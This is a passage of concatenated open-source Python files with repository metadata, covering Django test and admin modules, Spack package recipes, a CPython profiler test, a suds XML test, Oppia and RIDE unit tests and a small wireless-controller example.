self.assertFalse(self.grades[4].is_passed(self.GRADE_5))
def test_difficulty_points_consumed(self):
self._create_difficulty_thresholds()
for t in self.grades:
t.consume_harder_points = True
t.save()
self.assertFalse(self.grades[0].is_passed(self.GRADE_0))
self.assertFalse(self.grades[4].is_passed(self.GRADE_0))
self.assertTrue(self.grades[0].is_passed(self.GRADE_1))
self.assertFalse(self.grades[1].is_passed(self.GRADE_1))
self.assertTrue(self.grades[0].is_passed(self.GRADE_2))
self.assertTrue(self.grades[1].is_passed(self.GRADE_2))
self.assertFalse(self.grades[2].is_passed(self.GRADE_2))
self.assertTrue(self.grades[2].is_passed(self.GRADE_3))
self.assertFalse(self.grades[3].is_passed(self.GRADE_3))
self.assertTrue(self.grades[3].is_passed(self.GRADE_4))
self.assertFalse(self.grades[4].is_passed(self.GRADE_4))
self.assertTrue(self.grades[4].is_passed(self.GRADE_5))
self.assertTrue(self.grades[3].is_passed(self.GRADE_5))
self.assertTrue(self.grades[0].is_passed(self.GRADE_0, True))
self.assertFalse(self.grades[1].is_passed(self.GRADE_0, True))
def test_pass(self):
content = CachedContent(self.instance)
points = CachedPoints(self.instance, self.student, content)
t = Threshold.objects.create(course_instance=self.instance, name="test")
t.passed_categories.add(self.category)
self.assertTrue(t.is_passed(points))
t.passed_exercises.add(self.exercise)
self.assertTrue(t.is_passed(points))
t.passed_exercises.add(self.exercise2)
self.assertFalse(t.is_passed(points))
t.passed_exercises.clear()
t.passed_modules.add(self.module)
self.assertFalse(t.is_passed(points))
self.submission3.set_points(2,2)
self.submission3.set_ready()
self.submission3.save()
points = CachedPoints(self.instance, self.student, content)
self.assertTrue(t.is_passed(points))
| teemulehtinen/a-plus | threshold/tests.py | Python | gpl-3.0 | 7,011 |
#
# Newfies-Dialer License
# http://www.newfies-dialer.org
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
#
# Copyright (C) 2011-2013 Star2Billing S.L.
#
# The Initial Developer of the Original Code is
# Arezqui Belaid <[email protected]>
#
from django.contrib import admin
from django.contrib import messages
from django.conf.urls import patterns
from django.utils.translation import ugettext as _
from django.db.models import Count
from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect
from django.shortcuts import render_to_response
from django.template.context import RequestContext
from dialer_campaign.models import Campaign, Subscriber
from dialer_campaign.function_def import check_dialer_setting, dialer_setting_limit
from dialer_campaign.constants import SUBSCRIBER_STATUS, SUBSCRIBER_STATUS_NAME
from dialer_campaign.forms import SubscriberReportForm
from genericadmin.admin import GenericAdminModelAdmin
from common.common_functions import variable_value, ceil_strdate
from common.app_label_renamer import AppLabelRenamer
from datetime import datetime
APP_LABEL = _('Dialer Campaign')
AppLabelRenamer(native_app_label=u'dialer_campaign', app_label=APP_LABEL).main()
class CampaignAdmin(GenericAdminModelAdmin):
"""
Allows the administrator to view and modify certain attributes
of a Campaign.
"""
content_type_whitelist = ('survey/survey_template', )
fieldsets = (
(_('standard options').capitalize(), {
'fields': ('campaign_code', 'name', 'description', 'callerid',
'user', 'status', 'startingdate', 'expirationdate',
'aleg_gateway', 'content_type', 'object_id',
'extra_data', 'phonebook', 'voicemail', 'amd_behavior',
'voicemail_audiofile'
),
}),
(_('advanced options').capitalize(), {
'classes': ('collapse',),
'fields': ('frequency', 'callmaxduration', 'maxretry',
'intervalretry', 'calltimeout', 'imported_phonebook',
'daily_start_time', 'daily_stop_time',
'monday', 'tuesday', 'wednesday',
'thursday', 'friday', 'saturday', 'sunday',
'completion_maxretry', 'completion_intervalretry', 'dnc')
}),
)
list_display = ('id', 'name', 'content_type', 'campaign_code', 'user',
'startingdate', 'expirationdate', 'frequency',
'callmaxduration', 'maxretry', 'aleg_gateway', 'status',
'update_campaign_status', 'totalcontact', 'completed',
'subscriber_detail', 'progress_bar')
list_display_links = ('id', 'name', )
#list_filter doesn't display correctly too many elements in list_display
#list_filter = ['user', 'status', 'created_date']
ordering = ('-id', )
filter_horizontal = ('phonebook',)
def get_urls(self):
urls = super(CampaignAdmin, self).get_urls()
my_urls = patterns('',
(r'^$', self.admin_site.admin_view(self.changelist_view)),
(r'^add/$', self.admin_site.admin_view(self.add_view)),
)
return my_urls + urls
def add_view(self, request, extra_context=None):
"""
Override django add_view method for checking the dialer setting limit
**Logic Description**:
* Before adding campaign, check dialer setting limit if applicable
to the user, if matched then the user will be redirected to
the campaign list
"""
# Check dialer setting limit
# check Max Number of running campaigns
if check_dialer_setting(request, check_for="campaign"):
msg = _("you have too many campaigns. max allowed %(limit)s") \
% {'limit':
dialer_setting_limit(request, limit_for="campaign")}
messages.error(request, msg)
return HttpResponseRedirect(
reverse("admin:dialer_campaign_campaign_changelist"))
ctx = {}
return super(CampaignAdmin, self).add_view(request, extra_context=ctx)
admin.site.register(Campaign, CampaignAdmin)
class SubscriberAdmin(admin.ModelAdmin):
"""Allows the administrator to view and modify certain attributes
of a Subscriber."""
list_display = ('id', 'contact', 'campaign',
'last_attempt', 'count_attempt', 'completion_count_attempt', 'duplicate_contact',
'contact_name', 'status', 'created_date')
list_filter = ['campaign', 'status', 'created_date', 'last_attempt']
ordering = ('-id', )
raw_id_fields = ("contact",)
def get_urls(self):
urls = super(SubscriberAdmin, self).get_urls()
my_urls = patterns('',
(r'^subscriber_report/$', self.admin_site.admin_view(self.subscriber_report)),
)
return my_urls + urls
def subscriber_report(self, request):
"""
Get subscriber report
**Attributes**:
* ``form`` - SubscriberReportForm
* ``template`` - admin/dialer_campaign/subscriber/subscriber_report.html
"""
opts = Subscriber._meta
tday = datetime.today()
form = SubscriberReportForm(initial={"from_date": tday.strftime("%Y-%m-%d"),
"to_date": tday.strftime("%Y-%m-%d")})
total_subscriber = 0
total_pending = 0
total_pause = 0
total_abort = 0
total_fail = 0
total_sent = 0
total_in_process = 0
total_not_auth = 0
total_completed = 0
if request.method == 'POST':
form = SubscriberReportForm(request.POST)
if form.is_valid():
start_date = ''
end_date = ''
if request.POST.get('from_date'):
from_date = request.POST.get('from_date')
start_date = ceil_strdate(from_date, 'start')
if request.POST.get('to_date'):
to_date = request.POST.get('to_date')
end_date = ceil_strdate(to_date, 'end')
campaign_id = variable_value(request, 'campaign_id')
kwargs = {}
if start_date and end_date:
kwargs['updated_date__range'] = (start_date, end_date)
if start_date and end_date == '':
kwargs['updated_date__gte'] = start_date
if start_date == '' and end_date:
kwargs['updated_date__lte'] = end_date
if campaign_id and campaign_id != '0':
kwargs['campaign_id'] = campaign_id
select_data = {"updated_date": "SUBSTR(CAST(updated_date as CHAR(30)),1,10)"}
subscriber = Subscriber.objects\
.filter(**kwargs)\
.extra(select=select_data)\
.values('updated_date', 'status')\
.annotate(Count('updated_date'))\
.order_by('updated_date')
for i in subscriber:
total_subscriber += i['updated_date__count']
if i['status'] == SUBSCRIBER_STATUS.PENDING:
total_pending += i['updated_date__count']
elif i['status'] == SUBSCRIBER_STATUS.PAUSE:
total_pause += i['updated_date__count']
elif i['status'] == SUBSCRIBER_STATUS.ABORT:
total_abort += i['updated_date__count']
elif i['status'] == SUBSCRIBER_STATUS.FAIL:
total_fail += i['updated_date__count']
elif i['status'] == SUBSCRIBER_STATUS.SENT:
total_sent += i['updated_date__count']
elif i['status'] == SUBSCRIBER_STATUS.IN_PROCESS:
total_in_process += i['updated_date__count']
elif i['status'] == SUBSCRIBER_STATUS.NOT_AUTHORIZED:
total_not_auth += i['updated_date__count']
else:
#status COMPLETED
total_completed += i['updated_date__count']
ctx = RequestContext(request, {
'form': form,
'opts': opts,
'total_subscriber': total_subscriber,
'total_pending': total_pending,
'total_pause': total_pause,
'total_abort': total_abort,
'total_fail': total_fail,
'total_sent': total_sent,
'total_in_process': total_in_process,
'total_not_auth': total_not_auth,
'total_completed': total_completed,
'SUBSCRIBER_STATUS_NAME': SUBSCRIBER_STATUS_NAME,
'model_name': opts.object_name.lower(),
'app_label': APP_LABEL,
'title': _('subscriber report'),
})
return render_to_response('admin/dialer_campaign/subscriber/subscriber_report.html',
context_instance=ctx)
admin.site.register(Subscriber, SubscriberAdmin)
| garyjs/Newfiesautodialer | newfies/dialer_campaign/admin.py | Python | mpl-2.0 | 9,353 |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
# Copyright (C) 2011-2013 Serpent Consulting Services Pvt. Ltd. (<http://serpentcs.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import table_designer | ovnicraft/openerp-restaurant | poi_pos_table_designer/controllers/__init__.py | Python | agpl-3.0 | 1,093 |
"""
Django admin dashboard configuration.
"""
from config_models.admin import ConfigurationModelAdmin, KeyedConfigurationModelAdmin
from django.contrib import admin
from django.utils.translation import ugettext_lazy as _
from common.djangoapps.xblock_django.models import XBlockConfiguration, XBlockStudioConfiguration, XBlockStudioConfigurationFlag # lint-amnesty, pylint: disable=line-too-long
class XBlockConfigurationAdmin(KeyedConfigurationModelAdmin):
"""
Admin for XBlockConfiguration.
"""
fieldsets = (
('XBlock Name', {
'fields': ('name',)
}),
('Enable/Disable XBlock', {
'description': _('To disable the XBlock and prevent rendering in the LMS, leave "Enabled" deselected; '
'for clarity, update XBlockStudioConfiguration support state accordingly.'),
'fields': ('enabled',)
}),
('Deprecate XBlock', {
'description': _("Only XBlocks listed in a course's Advanced Module List can be flagged as deprecated. "
"Remember to update XBlockStudioConfiguration support state accordingly, as deprecated "
"does not impact whether or not new XBlock instances can be created in Studio."),
'fields': ('deprecated',)
}),
)
class XBlockStudioConfigurationAdmin(KeyedConfigurationModelAdmin):
"""
Admin for XBlockStudioConfiguration.
"""
fieldsets = (
('', {
'fields': ('name', 'template')
}),
('Enable Studio Authoring', {
'description': _(
'XBlock/template combinations that are disabled cannot be edited in Studio, regardless of support '
'level. Remember to also check if all instances of the XBlock are disabled in XBlockConfiguration.'
),
'fields': ('enabled',)
}),
('Support Level', {
'description': _(
"Enabled XBlock/template combinations with full or provisional support can always be created "
"in Studio. Unsupported XBlock/template combinations require course author opt-in."
),
'fields': ('support_level',)
}),
)
admin.site.register(XBlockConfiguration, XBlockConfigurationAdmin)
admin.site.register(XBlockStudioConfiguration, XBlockStudioConfigurationAdmin)
admin.site.register(XBlockStudioConfigurationFlag, ConfigurationModelAdmin)
| eduNEXT/edunext-platform | common/djangoapps/xblock_django/admin.py | Python | agpl-3.0 | 2,485 |
"""Deprecated import support. Auto-generated by import_shims/generate_shims.sh."""
# pylint: disable=redefined-builtin,wrong-import-position,wildcard-import,useless-suppression,line-too-long
from import_shims.warn import warn_deprecated_import
warn_deprecated_import('grades.exceptions', 'lms.djangoapps.grades.exceptions')
from lms.djangoapps.grades.exceptions import *
| eduNEXT/edunext-platform | import_shims/lms/grades/exceptions.py | Python | agpl-3.0 | 374 |
##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RLeaflet(RPackage):
"""Create and customize interactive maps using the 'Leaflet' JavaScript
library and the 'htmlwidgets' package. These maps can be used directly from
the R console, from 'RStudio', in Shiny apps and R Markdown documents."""
homepage = "http://rstudio.github.io/leaflet/"
url = "https://cran.r-project.org/src/contrib/leaflet_1.0.1.tar.gz"
version('1.0.1', '7f3d8b17092604d87d4eeb579f73d5df')
depends_on('r-base64enc', type=('build', 'run'))
depends_on('r-htmlwidgets', type=('build', 'run'))
depends_on('r-htmltools', type=('build', 'run'))
depends_on('r-magrittr', type=('build', 'run'))
depends_on('r-markdown', type=('build', 'run'))
depends_on('r-png', type=('build', 'run'))
depends_on('r-rcolorbrewer', type=('build', 'run'))
depends_on('r-raster', type=('build', 'run'))
depends_on('r-scales', type=('build', 'run'))
depends_on('r-sp', type=('build', 'run'))
| TheTimmy/spack | var/spack/repos/builtin/packages/r-leaflet/package.py | Python | lgpl-2.1 | 2,218 |
##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Saws(AutotoolsPackage):
"""The Scientific Application Web server (SAWs) turns any C or C++
scientific or engineering application code into a webserver,
allowing one to examine (and even modify) the state of the
simulation with any browser from anywhere."""
homepage = "https://bitbucket.org/saws/saws/wiki/Home"
version('develop', git='https://bitbucket.org/saws/saws.git', tag='master')
version('0.1.0', git='https://bitbucket.org/saws/saws.git', tag='v0.1.0')
| TheTimmy/spack | var/spack/repos/builtin/packages/saws/package.py | Python | lgpl-2.1 | 1,762 |
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RGdsfmt(RPackage):
"""R Interface to CoreArray Genomic Data Structure (GDS) Files.
This package provides a high-level R interface to CoreArray Genomic Data
Structure (GDS) data files, which are portable across platforms with
hierarchical structure to store multiple scalable array-oriented data
sets with metadata information. It is suited for large-scale datasets,
especially for data which are much larger than the available random-
access memory. The gdsfmt package offers the efficient operations
specifically designed for integers of less than 8 bits, since a diploid
genotype, like single-nucleotide polymorphism (SNP), usually occupies
fewer bits than a byte. Data compression and decompression are available
with relatively efficient random access. It is also allowed to read a
GDS file in parallel with multiple R processes supported by the package
parallel."""
homepage = "https://bioconductor.org/packages/gdsfmt"
git = "https://git.bioconductor.org/packages/gdsfmt.git"
version('1.20.0', commit='b1fbaba0a5ace3dc45daecc85168651cd85dce00')
version('1.18.1', commit='b911b953e9db7988e93ec2010b0ab1e384d073c9')
version('1.16.0', commit='49b011452585e432b983b68466a230c9b71d8a95')
version('1.14.1', commit='15743647b7eea5b82d3284858b4591fb6e59959d')
version('1.12.0', commit='d705a95b0bea7be2a2b37e939f45017337ba0fb6')
depends_on('[email protected]:', type=('build', 'run'))
| iulian787/spack | var/spack/repos/builtin/packages/r-gdsfmt/package.py | Python | lgpl-2.1 | 1,729 |
"""Test suite for the profile module."""
import sys
import pstats
import unittest
from difflib import unified_diff
from io import StringIO
from test.support import run_unittest
import profile
from test.profilee import testfunc, timer
class ProfileTest(unittest.TestCase):
profilerclass = profile.Profile
methodnames = ['print_stats', 'print_callers', 'print_callees']
expected_max_output = ':0(max)'
def get_expected_output(self):
return _ProfileOutput
@classmethod
def do_profiling(cls):
results = []
prof = cls.profilerclass(timer, 0.001)
start_timer = timer()
prof.runctx("testfunc()", globals(), locals())
results.append(timer() - start_timer)
for methodname in cls.methodnames:
s = StringIO()
stats = pstats.Stats(prof, stream=s)
stats.strip_dirs().sort_stats("stdname")
getattr(stats, methodname)()
output = s.getvalue().splitlines()
mod_name = testfunc.__module__.rsplit('.', 1)[1]
# Only compare against stats originating from the test file.
# Prevents outside code (e.g., the io module) from causing
# unexpected output.
output = [line.rstrip() for line in output if mod_name in line]
results.append('\n'.join(output))
return results
def test_cprofile(self):
results = self.do_profiling()
expected = self.get_expected_output()
self.assertEqual(results[0], 1000)
for i, method in enumerate(self.methodnames):
if results[i+1] != expected[method]:
print("Stats.%s output for %s doesn't fit expectation!" %
(method, self.profilerclass.__name__))
print('\n'.join(unified_diff(
results[i+1].split('\n'),
expected[method].split('\n'))))
def test_calling_conventions(self):
# Issue #5330: profile and cProfile wouldn't report C functions called
# with keyword arguments. We test all calling conventions.
stmts = [
"max([0])",
"max([0], key=int)",
"max([0], **dict(key=int))",
"max(*([0],))",
"max(*([0],), key=int)",
"max(*([0],), **dict(key=int))",
]
for stmt in stmts:
s = StringIO()
prof = self.profilerclass(timer, 0.001)
prof.runctx(stmt, globals(), locals())
stats = pstats.Stats(prof, stream=s)
stats.print_stats()
res = s.getvalue()
self.assertIn(self.expected_max_output, res,
"Profiling {0!r} didn't report max:\n{1}".format(stmt, res))
def regenerate_expected_output(filename, cls):
filename = filename.rstrip('co')
print('Regenerating %s...' % filename)
results = cls.do_profiling()
newfile = []
with open(filename, 'r') as f:
for line in f:
newfile.append(line)
if line.startswith('#--cut'):
break
with open(filename, 'w') as f:
f.writelines(newfile)
f.write("_ProfileOutput = {}\n")
for i, method in enumerate(cls.methodnames):
f.write('_ProfileOutput[%r] = """\\\n%s"""\n' % (
method, results[i+1]))
f.write('\nif __name__ == "__main__":\n main()\n')
def test_main():
run_unittest(ProfileTest)
def main():
if '-r' not in sys.argv:
test_main()
else:
regenerate_expected_output(__file__, ProfileTest)
# Don't remove this comment. Everything below it is auto-generated.
#--cut--------------------------------------------------------------------------
_ProfileOutput = {}
_ProfileOutput['print_stats'] = """\
28 27.972 0.999 27.972 0.999 profilee.py:110(__getattr__)
1 269.996 269.996 999.769 999.769 profilee.py:25(testfunc)
23/3 149.937 6.519 169.917 56.639 profilee.py:35(factorial)
20 19.980 0.999 19.980 0.999 profilee.py:48(mul)
2 39.986 19.993 599.830 299.915 profilee.py:55(helper)
4 115.984 28.996 119.964 29.991 profilee.py:73(helper1)
2 -0.006 -0.003 139.946 69.973 profilee.py:84(helper2_indirect)
8 311.976 38.997 399.912 49.989 profilee.py:88(helper2)
8 63.976 7.997 79.960 9.995 profilee.py:98(subhelper)"""
_ProfileOutput['print_callers'] = """\
:0(append) <- profilee.py:73(helper1)(4) 119.964
:0(exc_info) <- profilee.py:73(helper1)(4) 119.964
:0(hasattr) <- profilee.py:73(helper1)(4) 119.964
profilee.py:88(helper2)(8) 399.912
profilee.py:110(__getattr__) <- :0(hasattr)(12) 11.964
profilee.py:98(subhelper)(16) 79.960
profilee.py:25(testfunc) <- <string>:1(<module>)(1) 999.767
profilee.py:35(factorial) <- profilee.py:25(testfunc)(1) 999.769
profilee.py:35(factorial)(20) 169.917
profilee.py:84(helper2_indirect)(2) 139.946
profilee.py:48(mul) <- profilee.py:35(factorial)(20) 169.917
profilee.py:55(helper) <- profilee.py:25(testfunc)(2) 999.769
profilee.py:73(helper1) <- profilee.py:55(helper)(4) 599.830
profilee.py:84(helper2_indirect) <- profilee.py:55(helper)(2) 599.830
profilee.py:88(helper2) <- profilee.py:55(helper)(6) 599.830
profilee.py:84(helper2_indirect)(2) 139.946
profilee.py:98(subhelper) <- profilee.py:88(helper2)(8) 399.912"""
_ProfileOutput['print_callees'] = """\
:0(hasattr) -> profilee.py:110(__getattr__)(12) 27.972
<string>:1(<module>) -> profilee.py:25(testfunc)(1) 999.769
profilee.py:110(__getattr__) ->
profilee.py:25(testfunc) -> profilee.py:35(factorial)(1) 169.917
profilee.py:55(helper)(2) 599.830
profilee.py:35(factorial) -> profilee.py:35(factorial)(20) 169.917
profilee.py:48(mul)(20) 19.980
profilee.py:48(mul) ->
profilee.py:55(helper) -> profilee.py:73(helper1)(4) 119.964
profilee.py:84(helper2_indirect)(2) 139.946
profilee.py:88(helper2)(6) 399.912
profilee.py:73(helper1) -> :0(append)(4) -0.004
profilee.py:84(helper2_indirect) -> profilee.py:35(factorial)(2) 169.917
profilee.py:88(helper2)(2) 399.912
profilee.py:88(helper2) -> :0(hasattr)(8) 11.964
profilee.py:98(subhelper)(8) 79.960
profilee.py:98(subhelper) -> profilee.py:110(__getattr__)(16) 27.972"""
if __name__ == "__main__":
main()
| harmy/kbengine | kbe/res/scripts/common/Lib/test/test_profile.py | Python | lgpl-3.0 | 7,166 |
# This program is free software; you can redistribute it and/or modify
# it under the terms of the (LGPL) GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library Lesser General Public License for more details at
# ( http://www.gnu.org/licenses/lgpl.html ).
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# written by: Jeff Ortel ( [email protected] )
#
# sax encoding/decoding test.
#
from suds.sax.element import Element
from suds.sax.parser import Parser
def basic():
xml = "<a>Me && <b>my</b> shadow's <i>dog</i> love to 'play' and sing "la,la,la";</a>"
p = Parser()
d = p.parse(string=xml)
a = d.root()
print('A(parsed)=\n%s' % a)
assert str(a) == xml
b = Element('a')
b.setText('Me && <b>my</b> shadow\'s <i>dog</i> love to \'play\' and sing "la,la,la";')
print('B(encoded)=\n%s' % b)
assert str(b) == xml
print('A(text-decoded)=\n%s' % a.getText())
print('B(text-decoded)=\n%s' % b.getText())
assert a.getText() == b.getText()
print('test pruning')
j = Element('A')
j.set('n', 1)
j.append(Element('B'))
print(j)
j.prune()
print(j)
def cdata():
xml = '<a><![CDATA[<b>This is my &<tag></b>]]></a>'
p = Parser()
d = p.parse(string=xml)
print(d)
a = d.root()
print(a.getText())
if __name__ == '__main__':
#basic()
cdata()
| USGM/suds | tests/saxenc.py | Python | lgpl-3.0 | 1,896 |
# coding: utf-8
#
# Copyright 2018 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for recent commit controllers."""
from __future__ import annotations
from core import feconf
from core.platform import models
from core.tests import test_utils
(exp_models,) = models.Registry.import_models([models.NAMES.exploration])
class RecentCommitsHandlerUnitTests(test_utils.GenericTestBase):
"""Test the RecentCommitsHandler class."""
def setUp(self):
super(RecentCommitsHandlerUnitTests, self).setUp()
self.signup(self.MODERATOR_EMAIL, self.MODERATOR_USERNAME)
self.set_moderators([self.MODERATOR_USERNAME])
self.signup(self.VIEWER_EMAIL, self.VIEWER_USERNAME)
self.committer_1_id = self.get_user_id_from_email(self.VIEWER_EMAIL)
self.signup(self.NEW_USER_EMAIL, self.NEW_USER_USERNAME)
self.committer_2_id = self.get_user_id_from_email(self.NEW_USER_EMAIL)
commit1 = exp_models.ExplorationCommitLogEntryModel.create(
'entity_1', 0, self.committer_1_id, 'create',
'created first commit', [], 'public', True)
commit2 = exp_models.ExplorationCommitLogEntryModel.create(
'entity_1', 1, self.committer_2_id, 'edit', 'edited commit', [],
'public', True)
commit3 = exp_models.ExplorationCommitLogEntryModel.create(
'entity_2', 0, self.committer_1_id, 'create',
'created second commit', [], 'private', False)
commit1.exploration_id = 'exp_1'
commit2.exploration_id = 'exp_1'
commit3.exploration_id = 'exp_2'
commit1.update_timestamps()
commit1.put()
commit2.update_timestamps()
commit2.put()
commit3.update_timestamps()
commit3.put()
def test_get_recent_commits(self):
"""Test that this method should return all nonprivate commits."""
self.login(self.MODERATOR_EMAIL)
response_dict = self.get_json(
feconf.RECENT_COMMITS_DATA_URL,
params={'query_type': 'all_non_private_commits'})
self.assertEqual(len(response_dict['results']), 2)
self.assertDictContainsSubset(
{'username': self.VIEWER_USERNAME, 'exploration_id': 'exp_1',
'post_commit_status': 'public', 'version': 0,
'commit_message': 'created first commit',
'commit_type': 'create'},
response_dict['results'][1])
self.assertDictContainsSubset(
{'username': self.NEW_USER_USERNAME, 'exploration_id': 'exp_1',
'post_commit_status': 'public', 'version': 1,
'commit_message': 'edited commit',
'commit_type': 'edit'},
response_dict['results'][0])
self.logout()
def test_get_recent_commits_explorations(self):
"""Test that the response dict contains the correct exploration."""
self.login(self.MODERATOR_EMAIL)
self.save_new_default_exploration(
'exp_1', 'owner0', title='MyExploration')
response_dict = self.get_json(
feconf.RECENT_COMMITS_DATA_URL,
params={'query_type': 'all_non_private_commits'})
self.assertEqual(len(response_dict['exp_ids_to_exp_data']), 1)
self.assertEqual(
response_dict['exp_ids_to_exp_data']['exp_1']['title'],
'MyExploration')
self.logout()
def test_get_recent_commits_three_pages_with_cursor(self):
self.login(self.MODERATOR_EMAIL)
response_dict = self.get_json(
feconf.RECENT_COMMITS_DATA_URL,
params={'query_type': 'all_non_private_commits'})
self.assertFalse(response_dict['more'])
for i in range(feconf.COMMIT_LIST_PAGE_SIZE * 2):
entity_id = 'my_entity_%s' % i
exp_id = 'exp_%s' % i
commit_i = exp_models.ExplorationCommitLogEntryModel.create(
entity_id, 0, self.committer_2_id, 'create', 'created commit',
[], 'public', True)
commit_i.exploration_id = exp_id
commit_i.update_timestamps()
commit_i.put()
response_dict = self.get_json(
feconf.RECENT_COMMITS_DATA_URL,
params={'query_type': 'all_non_private_commits'})
self.assertEqual(
len(response_dict['results']), feconf.COMMIT_LIST_PAGE_SIZE)
self.assertTrue(response_dict['more'])
cursor = response_dict['cursor']
response_dict = self.get_json(
feconf.RECENT_COMMITS_DATA_URL,
params={
'query_type': 'all_non_private_commits',
'cursor': cursor
})
self.assertEqual(
len(response_dict['results']),
feconf.COMMIT_LIST_PAGE_SIZE)
self.assertTrue(response_dict['more'])
cursor = response_dict['cursor']
response_dict = self.get_json(
feconf.RECENT_COMMITS_DATA_URL,
params={
'query_type': 'all_non_private_commits',
'cursor': cursor
})
self.assertFalse(response_dict['more'])
self.assertEqual(len(response_dict['results']), 2)
self.logout()
def test_get_recent_commits_with_invalid_query_type_returns_404_status(
self):
self.login(self.MODERATOR_EMAIL)
self.get_json(
feconf.RECENT_COMMITS_DATA_URL,
params={'query_type': 'invalid_query_type'},
expected_status_int=404)
self.logout()
| brianrodri/oppia | core/controllers/recent_commits_test.py | Python | apache-2.0 | 6,058 |
import unittest
from robotide.controller.filecontrollers import ResourceFileControllerFactory
class ResourceFileControllerFactoryTestCase(unittest.TestCase):
def setUp(self):
namespace = lambda:0
project = lambda:0
self._resource_file_controller_factory = ResourceFileControllerFactory(namespace, project)
def test_is_all_resource_imports_resolved(self):
self.assertFalse(self._resource_file_controller_factory.is_all_resource_file_imports_resolved())
self._resource_file_controller_factory.set_all_resource_imports_resolved()
self.assertTrue(self._resource_file_controller_factory.is_all_resource_file_imports_resolved())
self._resource_file_controller_factory.set_all_resource_imports_unresolved()
self.assertFalse(self._resource_file_controller_factory.is_all_resource_file_imports_resolved())
def test_all_resource_imports_is_unresolved_when_new_resource_is_added(self):
self._resource_file_controller_factory.set_all_resource_imports_resolved()
data = lambda:0
data.source = 'source'
data.directory = 'directory'
self._resource_file_controller_factory.create(data)
self.assertFalse(self._resource_file_controller_factory.is_all_resource_file_imports_resolved())
def test_all_resource_imports_is_unresolved_when_new_resource_is_added(self):
self._resource_file_controller_factory.set_all_resource_imports_resolved()
resu = lambda:0
self._resource_file_controller_factory._resources.append(resu)
self._resource_file_controller_factory.remove(resu)
self.assertFalse(self._resource_file_controller_factory.is_all_resource_file_imports_resolved())
if __name__ == '__main__':
unittest.main()
| fingeronthebutton/RIDE | utest/controller/test_resourcefilecontrollerfactory.py | Python | apache-2.0 | 1,771 |
import demowlcutils
from demowlcutils import ppxml, WLC_login
from pprint import pprint as pp
from jnpr.wlc import WirelessLanController as WLC
wlc = WLC(host='a', user='b', password='c')
r = wlc.RpcMaker( target='vlan', name='Jeremy')
# you can access the following attributes, refer to the jnpr.wlc.builder
# file for more details
# r.cmd
# r.target
# r.args
| trmccart/py-jnprwlc | examples/maker.py | Python | apache-2.0 | 369 |
#
# Copyright 2006 The Apache Software Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from org.apache.hadoop.fs import Path
from org.apache.hadoop.io import *
from org.apache.hadoop.mapred import *
from org.apache.hadoop.abacus import *
from java.util import *;
import sys
